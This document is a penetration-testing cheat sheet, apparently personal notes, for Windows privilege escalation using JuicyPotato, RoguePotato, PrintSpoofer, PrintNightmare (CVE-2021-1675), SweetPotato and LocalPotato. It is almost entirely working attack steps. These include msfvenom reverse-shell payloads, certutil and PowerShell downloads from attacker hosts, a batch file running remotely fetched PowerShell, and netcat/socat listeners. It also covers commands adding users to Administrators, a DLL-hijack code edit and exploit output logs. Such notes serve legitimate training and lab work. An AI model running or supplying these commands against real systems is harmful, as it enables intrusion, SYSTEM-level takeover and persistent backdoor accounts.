Potato
Potato
JuicyPotato
This is a local privilege escalation tool to exploit Windows service accounts' impersonation privileges. The tool takes advantage of the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege if enabled on the machine to elevate the local privileges to System.
(Metasploit x86)
# @Kali
msfvenom -p windows/shell_reverse_tcp lhost=192.168.49.137 lport=443 -f exe -o shell.exe
# Download
#https://github.com/ohpe/juicy-potato/releases/tag/v0.1
#https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts
# @ Windows box
certutil -urlcache -split -f "http://192.168.142.155/shell.exe" shell.exe
certutil -urlcache -split -f "http://192.168.142.155/Juicy.Potato.x86.exe " Juicy.Potato.x86.exe
# @Kali
nc -nlvp 443
# @Windows box
>Juicy.Potato.x86.exe -l 1337 -p C:\Users\Public\Documents\shell.exe -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}
# -l: Any Port (currently 1337)
# -p: an executable to be escalated (full path)
# -t: *
# -c: CLSID number (https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise/)(PsExec)
# This is an exploit before Windows 10 1809 and it actually worked in Windows 7, 8, and 2008 R2.
# Assume that you has a reverse shell with a user privilege.
1. Run command below and find "SeImpersonate" or "SeAssignPrimaryToken".
# @Windows 7 box (via reverse shell)
Whoami /priv
2. Copy PSExec64.exe and the JuicyPotato.exe exploit executable over to Windows.
# @Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.142.155 LPORT=53 -f exe -o reverse.exe
# @Kali
sudo python3 -m http.server
# @Windows 7 box (via previous PE reverse shell)
>certutil -urlcache -split -f "http://192.168.142.155/reverse.exe" reverse.exe
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
https://github.com/ohpe/juicy-potato/releases/tag/v0.1
https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts
3. Use PSExec64.exe to trigger a reverse shell running as the Local Service service account
# @Windows 7 box (via previous PE reverse shell)
>PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
# @Windows 7 box (via previous PE reverse shell)
whoami
# Should be local service
4.Start another listener on Kali.
# @Kali
nc -nlvp 53
5. Now run the JuicyPotato exploit to trigger a reverse shell running with SYSTEM privileges.
# @Windows 7 box (via PsExec reverse shell)
>JuicyPotato.exe -l 1337 -p C:\PrivEsc\reverse.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}
# Pick any CLSID you want. Here you can find the list organized by OS.
# https://ohpe.it/juicy-potato/CLSID/
# Or run a GetCLSID.ps1 script in the site below.
# https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
# Good reference
# https://ohpe.it/juicy-potato/
(Powershell)
1. Download JuicyPotato.exe
# @Windows box (via reverse shell)
PS>(new-object net.webclient).downloadfile('http://10.10.14.2/JuicyPotato.exe', 'C:\Users\Public\Downloads\jp.exe')
2. Prepare a PowerShell reverse shell
# @Kali
cp /opt/win/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1
# At the end of the powershell code, add the following:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 1235
3. Create a shell.bat that contains the following code.
# @Kali
echo "powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.2/shell.ps1')" > shell.bat
4. Create a listener on port 1235
# @Kali
nc -nlvp 1235
5. Download the shell.bat
# @Windows box (via reverse shell)
PS>(new-object net.webclient).downloadfile('http://10.10.14.2/shell.bat', 'C:\Users\Public\Downloads\shell.bat')
6. Run the JuicyPotato Command
# Windows 8 or 2008 R2
PS>./jp.exe -t * -p shell.bat -l 4444
# Windows 10 15063
PS>./jp.exe -l 1337 -p shell.bat -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"RoguePotato
JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer, RoguePotato, SharpEfsPotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access.
GitHub: https://github.com/antonioCoco/RoguePotato
Blog: https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/
Pre-compliend: https://github.com/lochus/roguepotato
Hack the box: Remote
1. Establish socat and netcat listeners
# @Kali - Use Windows IP address
socat tcp-listen:135,reuseaddr,fork tcp:192.168.142.156:9999
# @Kali
nc -nlvp 53
2. Run PSexec for Reverse Shell
# @Windows 10 (Via previous reverse shell, ssh, or remote desktop connection)
C:\PrivEsc\PSExec64.exe -accepteula -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
# Now you have a connection to port 53
# @Windows 10 (via Kali Reverse shell)
whoami /priv
3. Run another netcat listener
# @Kali
nc -nlvp 53
4. Run the exploit
# @Windows 10 (Via previous reverse shell, ssh, or remote desktop connection)
C:\PrivEsc\RoguePotato.exe -r 192.168.142.159 -l 9999 -e "C:\PrivEsc\reverse.exe"
# @Kali
# Check a reverse shell connection
Another way (Local Administrator Group)
1. Establish socat listener
#@ Kali - Use Windows IP address
sudo socat tcp-listen:135,reuseaddr,fork tcp:172.16.1.102:9999
#@WIndows 10 (via previous reverse shell)
RoguePotato.exe -r 10.10.14.228 -l 9999 -e "net localgroup Administrators iptracej /add"
Another way (netcat based reverse connection)
#@ Kali - Use Windows IP address
sudo socat tcp-listen:135,reuseaddr,fork tcp:172.16.1.102:9999
#@ Kali
nc -nlvp 1234
#@WIndows 10 (via previous reverse shell)
RoguePotato.exe -r 10.10.14.228 -l 9999 -e "nc64.exe 10.10.10.10" 1234 -e cmd.exe" -l 9999
PrintSpoofer
CVE-2021-1675
1. Download the exploit
https://github.com/dievus/printspoofer (exe)
2. Run the exploit
# @Windows
> PrintSpoofer.exe -i -c cmd or
1. Download the exploit
# @Windows
https://github.com/calebstewart/CVE-2021-1675
2. Execute the exploit
# @Windows
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare
#[+] using default new user: adm1n
#[+] using default new password: P@ssw0rd
#[+] created payload at C:\Users\Atlas\AppData\Local\Temp\1\nightmare.dll
#[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.#inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll"
#[+] added user as local administrator
#[+] deleting payload from C:\Users\Atlas\AppData\Local\Temp\1\nightmare.dll
3. RunAs as a new local Administrator
# @Windows - This will pop up another window.
cd C:\Windows\System32
Start-Process powershell 'Start-Process cmd -Verb RunAs' -Credential adm1n
SweetPotato
Sweet Potato is a collection of various native Windows privilege escalation techniques from service accounts to SYSTEM. (C# exe)
0. Download & Build
# @Windows (if you have internet connection)
PS> wget https://raw.githubusercontent.com/zcgonvh/EfsPotato/master/EfsPotato.cs -OUTFILE EfsPotato.cs
PS> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe EfsPotato.cs
# upload the exe to /opt/shell/sweetpotato/EfsPotato.exe
1. Transfer exploit
# @Kali
cp /opt/shell/sweetpotato/EfsPotato.exe .
sudo python3 -m http.server
# @Windows
certutil -urlcache -split -f http://x.x.x.x/EfsPotato.exe
2. Run the exploit
# @Windows
.\EfsPotato.exe whoami(Empire Powershell)
0. If you are not set up yet, run the following command:
# @Kali
sudo apt install powershell-empire
1. Start Powershell-empire server and client
# @Kali
>sudo powershell-empire server
# @Kali (another console)
>sudo powershell-empire client
2. Set listener and create a shell
# @Kali
>uselistner http
>set Port 1234
>execute
>usestager windows/launcher_bat
>set Listener http
>execute
sudo mv /var/lib/powershell-empire/empire/client/generated-stagers/launcher.bat .
sudo python3 -m http.server 80
3. Execute
# @Windows
.\launcher.bat
4. Interact with Agent
# @Windows
>agents
>usemodule powershell/privesc/sweetpotato
>execute
GenericPotato
Generic Potato is a modified version of SweetPotato to support impersonating authentication over HTTP and/or named pipes. There must be a way to force a high-privileged process to do outbound http request (SSRF) or perform arbitrary filesystem read/wring (open/save file).
https://github.com/micahvandeusen/GenericPotato
https://github.com/JimKwikX/GenericPotato (Pre-compiled)
https://github.com/int0x33/nc.exe/raw/master/nc64.exe
This is a bit tricky since you would need SSRF bug.
# Rerefence
# https://jim-solomonx.medium.com/hackthebox-cereal-writeup-d1bf6133121f
LocalPotato
# Windows 2019
>systeminfo
#10.0.17763 N/A Build 17763
1. Get localPotato source code and LPE via StorSvc
> wget https://github.com/decoder-it/LocalPotato/releases/download/v1.0/LocalPotato.zip
> git clone https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc
2. Download and install MS build
https://aka.ms/vs/17/release/vs_BuildTools.exe
3. Change the target machine in storsvc_c.c
Go to ..\LPE via StorSvc\RpcClient\RpcClient\storsvc_c.c and update the target. This case, Windows 2019.
#if defined(_M_AMD64)
//#define WIN10
//#define WIN11
#define WIN2019
//#define WIN2022
4. Build the exe
Go to directory ..\LPE via StorSvc\RpcClient\RpcClient.vcxproj
>BUILD
# Build succeeded.
>move x64\Debug\RpcClient.exe C:\Users\user\Desktop\
5. Update the command in CreateProcess in main.c below
Go to LocalPotato\LPE via StorSvc\SprintCSP\SprintCSP\main.c, and update the CreateProcess to
CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators <user name> /add",
NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);
# You can run a metasploit based reverse shell.
# @Kali
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=53 -f exe -o reverse.exe
# CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C .\reverse.exe",NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);
6. Build dll
# @Windows box
Go to directory ..\LPE via StorSvc\SprintCSP\
>BUILD
# Build succeeded.
>move x64\Debug\SprintCSP.dll C:\Users\user\Desktop\
7. Check your membership
# @Windows box
>net user <user name>
8. Run LocalPotato
# @Windows box
>.\LocalPotato.exe -i SprintCSP.dll -o \Windows\System32\SprintCSP.dll
#[*] Objref Moniker Display Name = objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGAQAAAAAAAABTIvXDdMIUbap+AepkeJ/yAcgAAMwIwArWEKZ3vRDmhjkAIwAHAEMASABBAE4ARwBFAC0ATQBZAC0ASABPAFMAVABOAEEATQBFAAAABwAxADAALgAxADAALgA0ADAALgAyADMAMQAAAAAACQD//wAAHgD//wAAEAD//wAACgD//wAAFgD//wAAHwD//wAADgD//wAAAAA=:
#[*] Calling CoGetInstanceFromIStorage with CLSID:{854A20FB-2D44-457D-992F-EF13785D2B51}
#[*] Marshalling the IStorage object... IStorageTrigger written: 100 bytes
#[*] Received DCOM NTLM type 1 authentication from the privileged client
#[*] Connected to the SMB server with ip 127.0.0.1 and port 445
#[+] SMB Client Auth Context swapped with SYSTEM
#[+] RPC Server Auth Context swapped with the Current User
#[*] Received DCOM NTLM type 3 authentication from the privileged client
#[+] SMB reflected DCOM authentication succeeded!
#[+] SMB Connect Tree: \\127.0.0.1\c$ success
#[+] SMB Create Request File: Windows\System32\SprintCSP.dll success
#[+] SMB Write Request file: Windows\System32\SprintCSP.dll success
#[+] SMB Close File success
#[+] SMB Tree Disconnect success
9. Run Privilege Escalation
# @Windows box
>.\RpcClient.exe
# [+] Dll hijack triggered!
10. Check
net user <user name>
# Local Group Memberships *Administrators ! Last updated